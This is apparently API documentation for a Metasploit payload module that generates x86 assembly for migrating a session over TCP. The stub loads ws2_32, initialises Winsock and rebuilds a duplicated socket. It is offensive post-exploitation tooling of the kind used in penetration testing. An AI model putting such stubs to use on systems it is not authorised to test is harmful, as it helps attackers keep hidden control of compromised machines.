Module: Msf::Payload::Windows::MigrateTcp

Includes:
MigrateCommon
Defined in:
lib/msf/core/payload/windows/migrate_tcp.rb

Overview

Payload that supports migration over the TCP transport on x86.

Constant Summary

WSA_VERSION =
0x190

Instance Method Summary

Methods included from MigrateCommon

#generate

Methods included from BlockApi

#asm_block_api

Methods included from Msf::Payload::Windows

#apply_prepends, exit_types, #handle_intermediate_stage, #include_send_uuid, #replace_var

Methods included from PrependMigrate

#apply_prepend_migrate, #prepend_migrate, #prepend_migrate?, #prepend_migrate_64

Instance Method Details

#generate_migrate(opts = {}) ⇒ Object

Constructs the migrate stub on the fly



# File 'lib/msf/core/payload/windows/migrate_tcp.rb', line 31

# Builds the x86 assembly source for the TCP migrate stub.
#
# The API hashes are resolved up front so the assembly template only
# interpolates plain values. The stub, as written in the template, loads
# ws2_32, calls WSAStartup, creates a socket with WSASocketA using the
# WSAPROTOCOL_INFO struct found at [esi+0x10], and leaves the resulting
# socket handle in edi. +opts+ is accepted for interface compatibility
# with the caller and is not read here.
#
# @param opts [Hash] unused
# @return [String] assembly source, to be assembled by the caller
def generate_migrate(opts={})
  load_library_hash = Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')
  wsa_startup_hash  = Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')
  wsa_socket_hash   = Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')

  %Q^
  load_ws2_32:
    push '32'
    push 'ws2_'
    push esp                  ; pointer to 'ws2_32'
    push #{load_library_hash}
    call ebp                  ; LoadLibraryA('ws2_32')
  init_networking:
    mov eax, #{WSA_VERSION}   ; EAX == version, and is also used for size
    sub esp, eax              ; allocate space for the WSAData structure
    push esp                  ; Pointer to the WSAData structure
    push eax                  ; Version required
    push #{wsa_startup_hash}
    call ebp                  ; WSAStartup(Version, &WSAData)
  create_socket:
    push eax                  ; eax is 0 on success, use it for flags
    push eax                  ; reserved
    lea ebx, [esi+0x10]       ; get offset to the WSAPROTOCOL_INFO struct
    push ebx                  ; pass the info struct address
    push eax                  ; no protocol is specified
    inc eax
    push eax                  ; SOCK_STREAM
    inc eax
    push eax                  ; AF_INET
    push #{wsa_socket_hash}
    call ebp                  ; WSASocketA(AF_INET, SOCK_STREAM, 0, &info, 0, 0)
    xchg edi, eax
  ^
end

#initialize(info = {}) ⇒ Object



# File 'lib/msf/core/payload/windows/migrate_tcp.rb', line 17

# Registers this module's metadata (name, description, author, license,
# platform and architecture) by merging it into +info+ via update_info and
# handing the result to the superclass initializer.
#
# @param info [Hash] module info supplied by the caller, merged with the
#   metadata below
def initialize(info={})
  metadata = {
    'Name'        => 'TCP Transport Migration (x86)',
    'Description' => 'Migration stub to use over the TCP transport via x86',
    'Author'      => ['OJ Reeves'],
    'License'     => MSF_LICENSE,
    'Platform'    => 'win',
    'Arch'        => ARCH_X86
  }
  super(update_info(info, metadata))
end